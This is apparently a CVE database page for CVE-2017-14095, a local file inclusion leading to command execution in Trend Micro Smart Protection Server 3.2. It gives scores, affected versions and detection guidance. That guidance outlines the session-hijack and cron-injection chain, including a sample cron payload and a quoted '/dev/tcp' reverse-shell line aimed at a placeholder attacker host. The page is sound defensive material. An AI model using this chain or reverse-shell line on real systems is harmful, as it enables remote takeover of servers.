cbcvebase.
CVE-2017-14095
published 2018-01-19

CVE-2017-14095: A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a…

PriorityP262high8.1CVSS 3.0
AVNACHPRNUINSUCHIHAH
EXPLOIT
EPSS
12.48%
95.7th percentile
A vulnerability in Trend Micro Smart Protection Server (Standalone) versions 3.2 and below could allow an attacker to perform remote command execution via a local file inclusion on a vulnerable system.

Affected

2 ranges
VendorProductVersion rangeFixed in
trend_microtrend_micro_smart_protection_server
trendmicrosmart_protection_server<= 3.2

Detection & IOCsextracted from sources · hover to see the quote

path/widget/repository/log/diagnostic.log
path/var/www/AdminUI/widget/inc/class/common/db/GenericDao.php
path/var/spool/cron/webserv
path/var/www/AdminUI/php/admin_update_program.php
path/var/www/AdminUI/php/inc/crontab.php
path/widget/inc/widget_package_manager.php
urlhttps://<host>:<port>/widget/repository/log/diagnostic.log
urlhttps://<host>:<port>/php/admin_update_program.php?sid=<session_id>
commandhidTimingMin: * * * * * <command> #
port4343
  • Monitor unauthenticated HTTP GET requests to /widget/repository/log/diagnostic.log — attackers use this to harvest active session IDs without credentials.
  • Detect POST requests to /php/admin_update_program.php where the hidTimingMin parameter contains cron-injection patterns (e.g., multiple asterisks followed by a shell command and a '#' comment terminator).
  • Alert on modifications to /var/spool/cron/webserv, especially entries injected via the web application process (webserv user), as this is the cron file written by the vulnerable admin_update_program.php script.
  • Detect HTTP requests to /widget/inc/widget_package_manager.php with user-supplied path traversal or LFI payloads in parameters; the script appends 'PoolManager.php' to user input passed to require_once.
  • Look for the string 'MSG_UPDATE_UPDATE_SCHEDULE' in HTTP responses to POST requests targeting admin_update_program.php — its presence confirms successful cron job injection by the exploit.
  • Detect outbound reverse shell connections from the web server process (webserv) to external IPs over arbitrary high ports, consistent with 'bash -i >& /dev/tcp/<attacker>/<port> 0>&1' payloads.
  • ·The LFI vulnerability (CVE-2017-14095) in widget_package_manager.php has a restriction: the application appends 'PoolManager.php' to the attacker-supplied filename, which must be accounted for in any exploit or detection signature.
  • ·The cron injection and session hijacking exploits chain together — the attacker first harvests a session token from the unauthenticated log endpoint, then uses it to authenticate the POST to admin_update_program.php. Detection must account for this two-step chain.
  • ·Affected version confirmed in testing is Trend Micro Smart Protection Server 3.2 (Build 1085); other versions may also be affected but were not tested.

CVSS provenance

nvdv3.08.1HIGHCVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.